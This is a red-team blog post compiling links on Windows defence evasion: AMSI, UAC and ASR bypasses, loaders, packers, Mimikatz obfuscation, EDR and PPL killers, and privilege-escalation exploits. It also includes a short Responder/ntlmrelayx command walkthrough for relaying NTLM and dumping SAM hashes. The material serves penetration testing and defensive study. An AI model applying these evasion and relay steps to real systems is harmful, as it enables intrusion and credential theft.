Windows Evasion in 2025

Long overdue, a list we partly published already in our Notebook. Well yeah, title misleading - it’s things we’ve all done in Evasion but not yet all published. We held back with some stuff on purpose, to give Blue a headstart, before each and anything becomes public knowledge, and also we didn’t have time to do it properly yet. Most things should be in this pure-list-article, except for what the title image suggested.

More details to some techniques, revived evasions and explanations, you’ll find in the link above.

Defense Evasion, AMSI, UAC, …

Computers are made to execute code.
There’s hardly anything that can stop us entirely from executing our commands or code.
(they’re bad at telling who-is-who)

Technique X doesn’t work!

If it’s not a decade old, overused and patched 100 times, it may still have validity.

• Learning aspect
• Try and make it work again, find a new way
• Systems are complex and unpredictable: we made an AD lab setup with 3 identical clients, there’s often one reacting differently, suddenly allowing things that the other two don’t

General Tools & Info

• https://github.com/M2TeamArchived/NSudo/releases
• https://msportals.io/
• https://github.com/kodybrown/rktools2k3
• https://github.com/outflanknl/EvilClippy
• https://github.com/t3l3machus/hoaxshell
• https://github.com/klezVirus/chameleon
• https://github.com/t3l3machus/Villain
• https://github.com/JoelGMSec/Invoke-Stealth
• https://github.com/mitre/caldera
• https://github.com/antonioCoco/RunasCs
• https://fluidattacks.com/blog/amsi-bypass-python/
• https://amsi.fail/
• https://chnasarre.medium.com/start-a-journey-into-the-net-profiling-apis-40c76e2e36cc
• https://docs.microsoft.com/en-us/dotnet/api/system.reflection.emit.ilgenerator
• https://docs.microsoft.com/en-us/dotnet/standard/native-interop/cominterop
• https://docs.microsoft.com/en-us/dotnet/standard/native-interop
• https://docs.microsoft.com/en-us/dotnet/framework/interop/marshaling-classes-structures-and-unions
• https://docs.microsoft.com/en-us/dotnet/standard/native-interop/pinvoke
• https://github.com/rasta-mouse/ThreatCheck
• https://profile.network-sec.de/asm/syscalls_x86_x64.html (we’ve yet to make one for Windows)

Loader

• https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader
• https://github.com/Hagrid29/PELoader
• https://github.com/mgeeky/SharpShooter
• https://github.com/polycone/pe-loader
• https://github.com/TheKevinWang/SharpPick/
• Creating a Basic .NET Loader

FilelessPELoader

• https://github.com/TheD1rkMtr/FilelessPELoader.git
• https://github.com/SaadAhla/FilelessPELoader

MW Dev

• Github - Function name hashing algorithms
• Process Hollowing Explained
• An In-Depth Look into the Win32 Portable Executable File Format
• Windows PE File Format – Parsing PE File Headers
• LSASS Process and API Calls
• PInvoke .NET
• Using WinAPI in C#
• Shellcode Injection via Mapping Sections
• Thread Queue APC Injections
• LSASS Process and API Calls
• https://github.com/hyp3rlinx/PSTrojanFile

AMSI Bypass

• Bypassing AMSI via COM Server Hijacking
• EasyHook - The reinvention of Windows API hooking
• https://gist.github.com/dezhub/6d2a3ced01aaf081da841f4761455c5f
• https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/ (see blog.network-sec.de)
• MS Powershell - System.Management.Automation.dll Source Code
• https://medium.com/@bluedenkare/1-click-meterpreter-exploit-chain-with-beef-and-av-amsi-bypass-96b0eb61f1b6
• https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/

AMSI Killer

• https://github.com/ZeroMemoryEx/Amsi-Killer
• https://github.com/S1lkys/SharpKiller
• https://github.com/MaorSabag/TrueSightKiller

Bypassing Defender ATP

• https://www.blackhat.com/docs/eu-17/materials/eu-17-Thompson-Red-Team-Techniques-For-Evading-Bypassing-And-Disabling-MS-Advanced-Threat-Protection-And-Advanced-Threat-Analytics.pdf

ASR

• https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploitguard/enable-attack-surface-reduction
• https://twitter.com/EmericNasi
• http://blog.sevagas.com
• https://github.com/sevagas
• Windows Defender Attack Surface Reduction PDF
• Macro Pack on GitHub - Set of tools to Bypass ASR
• Macro Pack Binary - Consider these primarily

PPL Killer

• https://github.com/RedCursorSecurityConsulting/PPLKiller
• https://github.com/Mattiwatti/PPLKiller

DLL Injection

• https://github.com/stephenfewer/ReflectiveDLLInjection
• https://github.com/monoxgas/sRDI/
• DLL Injection via SetWindowsHookExA
• Reflective DLL Injection with PowerShell
• Github - Reflective DLL Injection
• https://github.com/reveng007/ReflectiveNtdll.git

Rootkits

• https://github.com/FuzzySecurity/Capcom-Rootkit
• https://www.codeproject.com/Articles/30815/An-Introduction-To-User-Mode-Rootkits

CLM bypass

• https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters#constrained-language

C# Basics

• Microsoft C# Documentation
• Learn C# - Codecademy
• C# Yellow Book by Rob Miles
• PInvoke .NET
• Using WinAPI in C#

Python C2 Server

• Flask Web Development with Python Tutorial
• GitHub - Sockets in Python
• Python Keylogger Project

C# Reverse Shell

• SharpReverseShell
• C# Reverse Shell Technique with Netcat

LDAP Enumeration

• LDAP Injection & Blind LDAP Injection
• Active Directory Enumeration with LDAP

Automating Active Directory Enumeration

• Active Directory Enumeration with PowerView
• BloodHound – Hacking Active Directory

avcleaner

https://blog.scrt.ch/2020/06/19/engineering-antivirus-evasion/
https://github.com/scrt/avcleaner

C/C++ source obfuscator for antivirus bypass

PEzor

https://github.com/phra/PEzor
https://iwantmore.pizza/posts/PEzor.html

Designing and Implementing PEzor, an Open-Source PE Packer

x0rro

https://iwantmore.pizza/posts/x0rro.html

A PE/ELF/MachO Crypter for x86 and x86_64 Based on Radare2

Obfuscating Mimikatz

https://sudonull.com/post/27330-Getting-around-Windows-Defender-cheaply-and-cheerfully-obfuscating-Mimikatz-THunter-Blog

HxD style binary patching

Mimikatz Obfuscator

https://gist.github.com/imaibou/92feba3455bf173f123fbe50bbe80781

Certifried combined with KrbRelayUp

https://gist.github.com/S3cur3Th1sSh1t/4c84557279ee23af89e40a9e41ee85d5

Non-privileged domain user to Domain Admin without adding/pre-owning computer accounts.

pypykatz

https://github.com/skelsec/pypykatz

Mimikatz implementation in pure Python.

Mimikatz

https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20220919

Building a custom Mimikatz binary

https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/ https://github.com/matterpreter/DefenderCheck
https://gist.github.com/S3cur3Th1sSh1t/ef2f2b296e26b18c361e40a3d1c2fda5 - S3cur3Th1sSh1t/mimikatz_obfuscator.sh
https://gist.github.com/S3cur3Th1sSh1t/08623de0c5cc67d36d4a235cec0f5333 - S3cur3Th1sSh1t/ObfuscateMimi_First.sh
https://gist.github.com/S3cur3Th1sSh1t/cb040a750f5984c41c8f979040ed112a - S3cur3Th1sSh1t/ObfuscateMimi_Seccond.sh
https://gist.github.com/S3cur3Th1sSh1t/18114a804a4819431107806319e91571 - S3cur3Th1sSh1t/kerberos_attacks_cheatsheet.md
https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/
https://gist.github.com/S3cur3Th1sSh1t/b33b978ea62a4b0f6ef545f1378512a6 - S3cur3Th1sSh1t/Invoke-CustomKatz.ps1

Responder

https://github.com/lgandx/Responder
https://www.virtuesecurity.com/kb/responder-multirelay-pentesting-cheatsheet/

Known-good version. Separate Windows-Host version available.

Inceptor

https://github.com/klezVirus/inceptor

Inceptor is a template-based PE packer for Windows, designed to help penetration testers and red teamers to bypass common AV and EDR solutions.

Customizing C2-Frameworks for AV-Evasion

https://s3cur3th1ssh1t.github.io/Customizing_C2_Frameworks/

Changing C2-Framework Powershell Empire source code for AV-Evasion.

amber

https://github.com/EgeBalci/amber
https://github.com/EgeBalci/amber/blob/8663119d9cfd818c86ed1a3a1988b5c1aa5e1453/handler.go

https://pentest.blog/introducing-new-packing-method-first-reflective-pe-packer/
First Reflective PE Packer Amber

donut

https://github.com/TheWover/donut?tab=readme-ov-file#usage

InflativeLoading

https://securityonline.info/inflativeloading-dynamically-convert-a-native-exe-to-pic-shellcode/

Dynamically convert a native EXE to PIC shellcode.

ProtectMyTooling

https://mgeeky.tech/protectmytooling/

Don’t detect tools, detect techniques.

avred

https://github.com/dobin/avred

Avred is being used to identify which parts of a file are identified by a Antivirus, and tries to show as much possible information and context about each match.

Peekaboo

https://github.com/cocomelonc/peekaboo

Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course. XOR encryption and decryption for functions call and main payload - msfvenom reverse shell as example.

Freeze

https://github.com/optiv/Freeze?tab=readme-ov-file
https://www.optiv.com/insights/source-zero/blog/sacrificing-suspended-processes

Sacrificing Suspended Processes - Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.

hacktricks

https://book.hacktricks.xyz/windows-hardening/av-bypass

CME

https://medium.com/r3d-buck3t/crackmapexec-in-action-enumerating-windows-networks-part-1-3a6a7e5644e9

ntlm_theft

https://github.com/Greenwolf/ntlm_theft

A tool for generating multiple types of NTLMv2 hash theft files. […] The benefits of these file types over say macro based documents or exploit documents are that all of these are built using “intended functionality”. None were flagged by Windows Defender Antivirus on June 2020, and 17 of the 21 attacks worked on a fully patched Windows 10 host.

ntlmrelayx

https://www.youtube.com/watch?v=C6Q5LVJ3KaQ

With responder and impacket

• Will allow you to dump SAM
• Attack must be performed against account / machine that is local admin and thus can dump SAM
• On victim machine there must be an attempt to access non-existent SMB share, e.g. \asawerfs
• Victim must be AD client. Server won’t work

$ nano responder.conf
HTTP = Off
SMB = Off

$ nmap --script=smb2-security-mode -p445 192.168.2.99

Must say: 2.02: Message signing enabled but not required
# by default it will say ...and required, which will prevent the attack
# needs to edit Group Policy to change this setting

# Responder will respond to non-existent SMB request and poison LLMNR
$ responder.py -I eth0 -rdw -v # some params may be different now

# Will dump SAM hashes
$ ntlmrelayx.py -tf /dev/shm/targetIP.txt -smb2support

UAC Bypass

• https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies
• https://www.atomicredteam.io/atomic-red-team/atomics/T1548.002
• https://github.com/hfiref0x/UACME
• https://github.com/shubham0d/UAC-bypass-using-dll-injection
• HEK.SI 2022 - Bypassing UAC With UACMe

fodhelper.exe - modified UAC bypass

• https://blog.network-sec.de/post/evasion_make_uac_bypass_work_again/

Works partly or not at all

at least not unmodified.

Wscript Trigger

• https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1

computerdefaults.exe

• https://lolbas-project.github.io/lolbas/Binaries/ComputerDefaults/
• https://gist.github.com/havoc3-3/812547525107bd138a1a839118a3a44b

Vuln Drivers & Kernel Stuff

• https://www.hackingarticles.in/windows-privilege-escalation-kernel-exploit/
• https://mdanilor.github.io/posts/hevd-1/
• https://github.com/eddeeh/kdmapper
• https://www.unknowncheats.me/forum/anti-cheat-bypass/320049-kdmapper-manual-map-driver-using-vulnerable-driver-intel.html
• https://www.youtube.com/watch?v=ELVdDwvELKY
• https://github.com/rasta-mouse/CVE-2018-19320

Privesc

• https://github.com/Network-Sec/privATM
• https://github.com/GhostPack/SharpUp
• https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation
• https://github.com/tylerdotrar/SigmaPotato
• https://github.com/BeichenDream/GodPotato
• https://www.kitploit.com/2023/05/godpotato-local-privilege-escalation.html
• https://www.zerodayinitiative.com/blog/2024/7/31/breaking-barriers-and-assumptions-techniques-for-privilege-escalation-on-windows-part-3
• https://www.kitploit.com/2021/07/remotepotato0-just-another-wont-fix.html
• http://www.fuzzysecurity.com/tutorials/16.html
• https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

Privesc Above LocalAdmin

From Administrator to further elevated, system accounts / privs

• https://github.com/fortra/CVE-2024-30051
• https://github.com/hakaioffsec/CVE-2024-21338
• https://github.com/Nero22k/Exploits/Windows/CVE-2024-21338 (allows entering of PIDs dynamically)

Persistence

• Windows Persistence with AdminSDHolder and SDProp

Easy Office Macros Signed

• https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros (old, untested)
• https://www.brightcarbon.com/blog/supercharging-powerpoint-interactive-presentations-with-vba-part-1/ (plausible denial attempt)
• https://github.com/Joflixen/signtool (this is the official one, not a hacking tool)

Defender

We generally disadvice to run precompiled binaries or to open Visual Studio projects (both are instant code execution for an adversary) from unknown sources without thorough check or using a sandboxed test system.

• https://github.com/wavestone-cdt/EDRSandblast/
• https://github.com/jacob-baines/concealed_position
• https://github.com/gabriellandau/EDRSandblast-GodFault

no longer working on latest patch level

• https://github.com/AlteredSecurity/Disable-TamperProtection
• https://github.com/cl4ym0re/cve-2023-21768-compiled

Unsorted Links

Maybe duplicates, just dropping here.

• Hack The Box - Sauna Write-up
• http://thisissecurity.net/2014/08/20/poweliks-command-line-confusion/
• https://blog.f-secure.com/hunting-for-amsi-bypasses/
• https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
• https://cryptopals.com/
• https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
• https://github.com/Allevon412/ReflectiveDLLInjector
• https://github.com/FuzzySecurity/PowerShell-Suite
• https://github.com/MzHmO/DebugAmsi
• https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
• https://github.com/deepinstinct/Dirty-Vanity
• https://github.com/gryhathack/PowerScrambler
• https://github.com/gryhathack/PowerSploit_Sensitive_Info_Hunter
• https://github.com/mgeeky/Stracciatella
• https://github.com/mvelazc0/defcon27_csharp_workshop
• https://github.com/rainerzufalldererste/windows_x64_shellcode_template
• https://github.com/rasta-mouse/AmsiScanBufferBypass
• https://github.com/sailay1996/expl-bin/blob/master/obfus.md
• https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
• https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Korkos-AMSI-and-Bypass.pdf
• https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-debugactiveprocess
• https://lolbas-project.github.io/lolbas/Binaries/Rundll32/
• https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90
• https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
• https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
• https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
• https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/
• https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/
• https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/
• https://slaeryan.github.io/posts/falcon-zero-alpha.html
• https://stackoverflow.com/questions/25131484/rundll32-exe-javascript
• https://www.blackhillsinfosec.com/wp-content/uploads/2020/12/SLIDES_MoveAsideScriptKiddies.pdf
• https://www.cyberark.com/resources/threat-research-blog/amsi-bypass-redux
• https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
• https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
• https://www.stormshield.com/news/poweliks-command-line-confusion/
• https://www.youtube.com/watch?v=Fpb4eL3vMgk